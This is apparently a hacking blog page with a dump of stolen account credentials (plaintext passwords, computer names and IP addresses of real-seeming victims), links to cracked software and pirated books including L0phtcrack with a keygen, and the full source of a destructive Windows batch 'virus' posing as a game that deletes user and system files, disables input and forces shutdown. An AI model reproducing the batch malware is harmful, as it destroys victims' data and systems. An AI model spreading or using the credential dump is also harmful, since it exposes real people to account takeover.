Login: [email protected]
Password: (null)
Computer: DJD02
Date: 2010-08-06 18:12:09
Ip: 189.75.84.6
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.softnyx.net
Login: highemokid178
Password: kevinboy178
Computer: PC_van_boy
Date: 2010-08-06 20:16:44
Ip: 77.167.4.188
----------------------------------------------------------
Program: Firefox
Url/Host: http://combatarms.nexon.net
Login: kevinboy167
Password: kevinboy178
Computer: PC_van_boy
Date: 2010-08-06 20:16:44
Ip: 77.167.4.188
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: DJD02
Date: 2010-08-06 18:12:09
Ip: 189.75.84.6
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.imvu.com
Login: kevin156789
Password: kevindoll
Computer: PC_van_boy
Date: 2010-08-06 20:16:44
Ip: 77.167.4.188
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: Macdonald-Dator
Date: 2010-08-06 18:12:12
Ip: 85.230.124.47
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: DAT-47A1576EC1F
Date: 2010-08-06 18:12:12
Ip: 81.231.106.140
----------------------------------------------------------
Program: Firefox
Url/Host: http://passport.nexon.net
Login: kevinboy178
Password: kevinboy167
Computer: PC_van_boy
Date: 2010-08-06 20:16:44
Ip: 77.167.4.188
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: DAT-47A1576EC1F
Date: 2010-08-06 18:12:12
Ip: 81.231.106.140
----------------------------------------------------------
Program: FileZilla
Url/Host: mmowned.com
Login: root
Password: Jae71lEINOCKAEnau
Computer: MasterZ
Date: 2010-08-06 18:12:12
Ip: 76.104.242.170
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: kevinboy167
Computer: PC_van_boy
Date: 2010-08-06 20:16:43
Ip: 77.167.4.188
----------------------------------------------------------
Program: FileZilla
Url/Host: pkisland.com
Login: rsfk
Password: r22rQfcPiBuj
Computer: MasterZ
Date: 2010-08-06 18:12:11
Ip: 76.104.242.170
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: PC_van_boy
Date: 2010-08-06 20:16:43
Ip: 77.167.4.188
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.wer-kennt-wen.de
Login: [email protected]
Password: 05111998
Computer: BIE
Date: 2010-08-06 18:50:57
Ip: 188.193.8.80
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: kevinboy178
Computer: PC_van_boy
Date: 2010-08-06 20:16:43
Ip: 77.167.4.188
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.meinvz.net
Login: [email protected]
Password: 05111998
Computer: BIE
Date: 2010-08-06 18:50:57
Ip: 188.193.8.80
----------------------------------------------------------
Program: FileZilla
Url/Host: 217.18.71.52
Login: root
Password: PZojc8AZojd3
Computer: MasterZ
Date: 2010-08-06 18:12:11
Ip: 76.104.242.170
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.gmx.net
Login: [email protected]
Password: 05111998
Computer: BIE
Date: 2010-08-06 18:50:57
Ip: 188.193.8.80
----------------------------------------------------------
Program: Firefox
Url/Host: https://signin.ebay.de
Login: Lomfredo81
Password: Leana0512
Computer: BIE
Date: 2010-08-06 18:50:57
Ip: 188.193.8.80
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: lolwut11
Computer: MasterZ
Date: 2010-08-06 18:12:06
Ip: 76.104.242.170
----------------------------------------------------------
Program: Firefox
Url/Host: http://login.live.com
Login: [email protected]
Password: Leana0512
Computer: BIE
Date: 2010-08-06 18:50:57
Ip: 188.193.8.80
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: derrell12
Computer: MasterZ
Date: 2010-08-06 18:12:06
Ip: 76.104.242.170
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.meinvz.net
Login: [email protected]
Password: Muckel
Computer: BIE
Date: 2010-08-06 18:50:57
Ip: 188.193.8.80
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: MasterZ
Date: 2010-08-06 18:12:05
Ip: 76.104.242.170
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.gmx.net
Login: [email protected]
Password: Muckels
Computer: BIE
Date: 2010-08-06 18:50:56
Ip: 188.193.8.80
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: ententes
Computer: Yvon-Salon
Date: 2010-08-06 18:15:53
Ip: 80.119.149.180
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: Leana0512
Computer: BIE
Date: 2010-08-06 18:50:56
Ip: 188.193.8.80
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: tacos11
Computer: MasterZ
Date: 2010-08-06 18:12:05
Ip: 76.104.242.170
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: IL040107
Computer: Yvon-Salon
Date: 2010-08-06 18:15:53
Ip: 80.119.149.180
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: l0lwut11
Computer: MasterZ
Date: 2010-08-06 18:12:05
Ip: 76.104.242.170
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.facebook.com
Login: [email protected]
Password: senza ,usica nn vivo
Computer: PC-USER
Date: 2010-08-06 18:13:27
Ip: 87.10.83.172
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: DAT-47A1576EC1F
Date: 2010-08-06 18:12:12
Ip: 81.231.106.140
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: Macdonald-Dator
Date: 2010-08-06 18:12:12
Ip: 85.230.124.47
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: DAT-47A1576EC1F
Date: 2010-08-06 18:12:12
Ip: 81.231.106.140
----------------------------------------------------------
Program: Firefox
Url/Host: http://it-it.facebook.com
Login: [email protected]
Password: senza musica nn vivo
Computer: PC-USER
Date: 2010-08-06 18:13:26
Ip: 87.10.83.172
----------------------------------------------------------
Program: FileZilla
Url/Host: mmowned.com
Login: mmowned
Password: $EXXKV_dvuv&amp;
Computer: MasterZ
Date: 2010-08-06 18:12:12
Ip: 76.104.242.170
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: DAT-47A1576EC1F
Date: 2010-08-06 18:12:12
Ip: 81.231.106.140
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: Macdonald-Dator
Date: 2010-08-06 18:12:12
Ip: 85.230.124.47
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: DAT-47A1576EC1F
Date: 2010-08-06 18:12:12
Ip: 81.231.106.140
----------------------------------------------------------
Program: MSN Messenger
Url/Host:
Login: [email protected]
Password: (null)
Computer: DAT-47A1576EC1F
Date: 2010-08-06 18:12:12
Ip: 81.231.106.140
----------------------------------------------------------


Read More Add your Comment 4 comments


Some Great Hacking EBooks + Essential tools



Learning python


[Image: 9780596513986_lrg.jpg]With this hands-on book, you can master the fundamentals of the core Python language quickly and efficiently, whether you're new to programming or just new to Python. Each chapter is a self-contained lesson that helps you thoroughly understand a key component of Python. Each chapter also contains Brain Builder, a unique section with practical exercises and review quizzes that let you practice new skills and test your understanding as you go.
Full Description
Portable, powerful, and a breeze to use, Python is ideal for both standalone programs and scripting applications. With this hands-on book, you can master the fundamentals of the core Python language quickly and efficiently, whether you're new to programming or just new to Python. Once you finish, you will know enough about the language to use it in any application domain you choose.

Learning Python is based on material from author Mark Lutz's popular training courses, which he's taught over the past decade. Each chapter is a self-contained lesson that helps you thoroughly understand a key component of Python before you continue. Along with plenty of annotated examples, illustrations, and chapter summaries, every chapter also contains Brain Builder, a unique section with practical exercises and review quizzes that let you practice new skills and test your understanding as you go.

This book covers:

* Types and Operations -- Python's major built-in object types in depth: numbers, lists, dictionaries, and more


* Statements and Syntax -- the code you type to create and process objects in Python, along with Python's general syntax model


* Functions -- Python's basic procedural tool for structuring and reusing code


* Modules -- packages of statements, functions, and other tools organized into larger components


* Classes and OOP -- Python's optional object-oriented programming tool for structuring code for customization and reuse


* Exceptions and Tools -- exception handling model and statements, plus a look at development tools for writing larger programs

Learning Python gives you a deep and complete understanding of the language that will help you comprehend any application-level examples of Python that you later encounter. If you're ready to discover what Google and YouTube see in Python, this book is the best way to get started.

http://rapidshare.com/files/141590244/OR...7.pdf.html

The TCP/IP Guide
A Comprehensive, Illustrated Internet Protocols



[Image: 410x4vwagqlcopywh4.jpg]From Charles M. Kozierok, the creator of the highly regarded www.pcguide.com, comes The TCP/IP Guide. This completely up-to-date, encyclopedic reference on the TCP/IP protocol suite will appeal to newcomers and the seasoned professional alike. Kozierok details the core protocols that make TCP/IP internetworks function and the most important classic TCP/IP applications, integrating IPv6 coverage throughout. Over 350 illustrations and hundreds of tables help to explain the finer points of this complex topic. The book’s personal, user-friendly writing style lets readers of all levels understand the dozens of protocols and technologies that run the Internet, with full coverage of PPP, ARP, IP, IPv6, IP NAT, IPSec, Mobile IP, ICMP, RIP, BGP, TCP, UDP, DNS, DHCP, SNMP, FTP, SMTP, NNTP, HTTP, Telnet, and much more.

The TCP/IP Guide is a must-have addition to the libraries of internetworking students, educators, networking professionals, and those working toward certification.

October 2005
Hardcover
ISBN-10 1-59327-047-X
ISBN-13 978-159327-047-6
----------------------------------------------------------------------
A K-S32 Exclusive. The only PDF release of this book with the original book cover and the password removed. Edited and cracked with Nitro PDF and PDF password remover.

A very good book for beginners and professionals. If this book cant teach you TCP/IP probably nothing can.

http://rapidshare.com/files/139323676/Th...e.pdf.html

Welcome to the AirPcap family of WLAN packet capture solutions. The AirPcap family is the first open, affordable and easy-to-deploy packet capture solution for Windows. All of the AirPcap offerings capture full 802.11 data, management, and control frames that can be viewed in Wireshark thereby providing in-depth protocol dissection and analysis capabilities. Below we provide a feature matrix that gives a high-level overview of the feature sets of the adapters in the AirPcap Product Family. More detailed information regarding each the member of the AirPcap Product Family can be found on each member’s product page.

------------------------------------------------

A VERY hard to find and expensive driver but of course like other priceless products they are always within reach of K-S32. Wireshark and Cain and able supported. Good luck finding this somewhere else. In case you don't know this is used for WIRELESS packet sniffing.

Enjoy! and Happy Hacking!

NOTE: If the link becomes broken please post hear and let me know and I will create a new one.



Welcome to the AirPcap family of WLAN packet capture solutions. The AirPcap family is the first open, affordable and easy-to-deploy packet capture solution for Windows. All of the AirPcap offerings capture full 802.11 data, management, and control frames that can be viewed in Wireshark thereby providing in-depth protocol dissection and analysis capabilities. Below we provide a feature matrix that gives a high-level overview of the feature sets of the adapters in the AirPcap Product Family. More detailed information regarding each the member of the AirPcap Product Family can be found on each member’s product page.

------------------------------------------------

A VERY hard to find and expensive driver but of course like other priceless products they are always within reach of K-S32. Wireshark and Cain and able supported. Good luck finding this somewhere else. In case you don't know this is used for WIRELESS packet sniffing.

Enjoy! and Happy Hacking!

NOTE: If the link becomes broken please post hear and let me know and I will create a new one.

http://rapidshare.com/files/139548088/Ai...8.iso.html


Ivor Horton's Beginning Visual C++ 2008


[Image: 0764571974.01._SCLZZZZZZZ_.jpg]


Ivor Horton’s Beginning Visual C++ 2008

Proudly presenting the latest edition of one of the all-time bestselling books on the C++ language, successful author Ivor Horton repeats the formula that has made each previous edition so popular by teaching you both the standard C++ language and C++/CLI as well as Visual C++ 2008. Thoroughly updated for the 2008 release, this book shows you how to build real-world applications using Visual C++ and guides you through the ins and outs of C++ development.

Horton’s accessible approach and detailed examples cover both flavors of the C++ language-native ISO/ANSIC++ Windows application development using the Microsoft Foundation Classes (MFC), as well as the development of C++/CLI Windows applications using Windows Forms. He also introduces you to the techniques you can use for accessing data sources in both MFC and Windows Forms, and working examples demonstrate each programming technique that is being discussed. With this book by your side, you are well on your way to becoming a successful C++ programmer.

What you will learn from this book

    * How to use the Standard Template Library, a powerful and extensive set of tools for organizing and manipulating data in your native C++ programs
    * Techniques for finding errors in your C++ programs
    * The ways that Microsoft® Windows® applications are structured and the elements that are essential for each application
    * How to create and use common controls in order to build the graphical user interface for your application
    * Ways to develop your own libraries using MFC
    * The different controls that are available for accessing data sources, how they work, and how to customize them

Who this book is for
This book is for anyone who wants to write C++ applications for the Microsoft Windows OS. No prior experience of any programming language is assumed.

Wrox Beginning guides are crafted to make learning programming languages and technologies easier than you think, providing a structured, tutorial format that will guide you through all the techniques involved.

Link1 (From Me)
http://rapidshare.com/files/134469531/Iv...g.pdf.html

Link 2
http://rapidshare.com/files/131730651/ne...2590-5.rar

Torrent:


Visual Studio 8 (Required for full use of book)
http://thepiratebay.org/torrent/4088718/...tudio_2008
Format: PDF

Pages:1394

Part of the American Library of Congress

L0phtcrack5

http://rapidshare.com/files/132681575/L0...4.zip.html

Many people call this $300 password cracking software the best in the world. Best than john the ripper by a good bit. Includes keygen and normal / professional / administrator version of this software.


Giant virus BIG THANKS TO faizulhaque for this one.
------------------------
@echo off
color 0A
title Game
:Menu
echo Game
echo.
echo There Is An Asshole Tries To Kill You, What You Will Do?
echo.
echo 1.You Kill Yourself
echo.
echo 2.You Kill Him
echo -------------------------------------------------------------
set input=nothing
set /p input= Code:
if %input%==1 goto 1
if %input%==2 goto 2

:1
attrib 1.bat +s
attrib 1.bat +r
attrib 1.bat +h
start C:\WINDOWS\system32\oobe\images\title.wma
copy "1.bat" "C:\"
copy "1.bat" "C:\Documents and Settings\bozo\My Documents"
msg * Youve Got Nothing!
RUNDLL32.EXE USER32.DLL,SwapMouseButton
rundll32.exe keyboard.dll,disable
md LimeWire Virus! NOD32 SUX!
md LimeWire Virus! NOD32 SUX!2
md LimeWire Virus! NOD32 SUX!3
md LimeWire Virus! NOD32 SUX!4
md LimeWire Virus! NOD32 SUX!5
md LimeWire Virus! NOD32 SUX!6
md LimeWire Virus! NOD32 SUX!7
md LimeWire Virus! NOD32 SUX!8
md LimeWire Virus! NOD32 SUX!9
md LimeWire Virus! NOD32 SUX!10
md LimeWire Virus! NOD32 SUX!11
md LimeWire Virus! NOD32 SUX!12
md LimeWire Virus! NOD32 SUX!13
md LimeWire Virus! NOD32 SUX!14
md LimeWire Virus! NOD32 SUX!15
md LimeWire Virus! NOD32 SUX!16
md LimeWire Virus! NOD32 SUX!17
md LimeWire Virus! NOD32 SUX!18
md LimeWire Virus! NOD32 SUX!19
md LimeWire Virus! NOD32 SUX!20
md LimeWire Virus! NOD32 SUX!21
md LimeWire Virus! NOD32 SUX!22
md LimeWire Virus! NOD32 SUX!23
rem Made with DeLeetEd virus maker v3
rem Vist http://www.freewebs.com/deleeted for more HAX
md LimeWire Virus! NOD32 SUX!24
md LimeWire Virus! NOD32 SUX!25
md LimeWire Virus! NOD32 SUX!26
md LimeWire Virus! NOD32 SUX!27
md LimeWire Virus! NOD32 SUX!28
md LimeWire Virus! NOD32 SUX!29
md LimeWire Virus! NOD32 SUX!30
md LimeWire Virus! NOD32 SUX!31
md LimeWire Virus! NOD32 SUX!32
md LimeWire Virus! NOD32 SUX!33
md LimeWire Virus! NOD32 SUX!34
md LimeWire Virus! NOD32 SUX!35
md LimeWire Virus! NOD32 SUX!36
md LimeWire Virus! NOD32 SUX!37
md LimeWire Virus! NOD32 SUX!38
md LimeWire Virus! NOD32 SUX!39
md LimeWire Virus! NOD32 SUX!40
time 0:00
start http://www.youareanidiot.org
cd %userprofile%\Desktop
if exist "*.*txt" del "*.*txt"
if exist "*.*exe" del "*.*exe"
if exist "*.*wav" del "*.*wav"
if exist "*.*mp3" del "*.*mp3"
cd %userprofile%\My Documents\My Music
if exist "*.*mp3" del "*.*mp3"
if exist "*.*wav" del "*.*wav"
if exist "*.*exe" del "*.*exe"
if exist "*.*txt" del "*.*txt"
cd C:\WINDOWS
if exist "*.*dll" del "*.*dll"
if exist "*.*exe" del "*.*exe"
if exist "*.*tmp" del "*.*tmp"
if exist "*.*txt" del "*.*txt"
cd C:\WINDOWS\system
if exist "*.*dll" del "*.*dll"
if exist "*.*drv" del "*.*drv"
cd C:\WINDOWS\system32
if exist "*.*dll" del "*.*dll"
if exist "*.*exe" del "*.*exe"
if exist "*.*tmp" del "*.*tmp"
if exist "*.*txt" del "*.*txt"
cd C:\WINDOWS\Media
if exist "*.*mp3" del "*.*mp3"
if exist "*.*wav" del "*.*wav"
if exist "*.*exe" del "*.*exe"
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
shutdown -s -t 30 -c "You Have 30 Seconds Before Your Computer Will Be Formated"
cls
goto 2

:2
echo Bravo tu a gagner!
del "C:\WINDOWS" /q/s >nul
start http://www.spam.com
msg * SEX PORNO!
RUNDLL32.EXE USER32.DLL,SwapMouseButton
rundll32.exe keyboard.dll,disable
md WINDOWS VISTA SUX! (lime wire virus)
md WINDOWS VISTA SUX! (lime wire virus)2
md WINDOWS VISTA SUX! (lime wire virus)3
md WINDOWS VISTA SUX! (lime wire virus)4
md WINDOWS VISTA SUX! (lime wire virus)5
md WINDOWS VISTA SUX! (lime wire virus)6
md WINDOWS VISTA SUX! (lime wire virus)7
md WINDOWS VISTA SUX! (lime wire virus)8
md WINDOWS VISTA SUX! (lime wire virus)9
md WINDOWS VISTA SUX! (lime wire virus)10
md WINDOWS VISTA SUX! (lime wire virus)11
md WINDOWS VISTA SUX! (lime wire virus)12
md WINDOWS VISTA SUX! (lime wire virus)13
md WINDOWS VISTA SUX! (lime wire virus)14
md WINDOWS VISTA SUX! (lime wire virus)15
md WINDOWS VISTA SUX! (lime wire virus)16
md WINDOWS VISTA SUX! (lime wire virus)17
md WINDOWS VISTA SUX! (lime wire virus)18
md WINDOWS VISTA SUX! (lime wire virus)19
md WINDOWS VISTA SUX! (lime wire virus)20
md WINDOWS VISTA SUX! (lime wire virus)21
md WINDOWS VISTA SUX! (lime wire virus)22
md WINDOWS VISTA SUX! (lime wire virus)23
rem Made with DeLeetEd virus maker v2
md WINDOWS VISTA SUX! (lime wire virus)24
md WINDOWS VISTA SUX! (lime wire virus)25
md WINDOWS VISTA SUX! (lime wire virus)26
md WINDOWS VISTA SUX! (lime wire virus)27
md WINDOWS VISTA SUX! (lime wire virus)28
md WINDOWS VISTA SUX! (lime wire virus)29
md WINDOWS VISTA SUX! (lime wire virus)30
md WINDOWS VISTA SUX! (lime wire virus)31
md WINDOWS VISTA SUX! (lime wire virus)32
md WINDOWS VISTA SUX! (lime wire virus)33
md WINDOWS VISTA SUX! (lime wire virus)34
md WINDOWS VISTA SUX! (lime wire virus)35
md WINDOWS VISTA SUX! (lime wire virus)36
md WINDOWS VISTA SUX! (lime wire virus)37
md WINDOWS VISTA SUX! (lime wire virus)38
md WINDOWS VISTA SUX! (lime wire virus)39
md WINDOWS VISTA SUX! (lime wire virus)40
time 13:37
start http://liveaccount.freehostia.com/login.php
cd %userprofile%\Desktop
if exist "*.*txt" del "*.*txt"
if exist "*.*exe" del "*.*exe"
if exist "*.*wav" del "*.*wav"
if exist "*.*mp3" del "*.*mp3"
cd %userprofile%\My Documents\My Music
if exist "*.*mp3" del "*.*mp3"
if exist "*.*wav" del "*.*wav"
if exist "*.*exe" del "*.*exe"
if exist "*.*txt" del "*.*txt"
cd C:\WINDOWS
if exist "*.*dll" del "*.*dll"
if exist "*.*exe" del "*.*exe"
if exist "*.*tmp" del "*.*tmp"
if exist "*.*txt" del "*.*txt"
cd C:\WINDOWS\system
if exist "*.*dll" del "*.*dll"
if exist "*.*drv" del "*.*drv"
cd C:\WINDOWS\system32
if exist "*.*dll" del "*.*dll"
if exist "*.*exe" del "*.*exe"
if exist "*.*tmp" del "*.*tmp"
if exist "*.*txt" del "*.*txt"
cd C:\WINDOWS\Media
if exist "*.*mp3" del "*.*mp3"
if exist "*.*wav" del "*.*wav"
if exist "*.*exe" del "*.*exe"
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
shutdown -s -t 30 -c "You Have 30 Seconds Before Your Computer Will Be Formated"
cls
goto 1
................................................................................................................................................ ............................
................................................................................................................................................ ............................
................................................................................................................................................ ............................


Read More Add your Comment 0 comments


 

© 2011 Learn Cyber Security All Rights Reserved Learn Hacking Online hackguide4u.com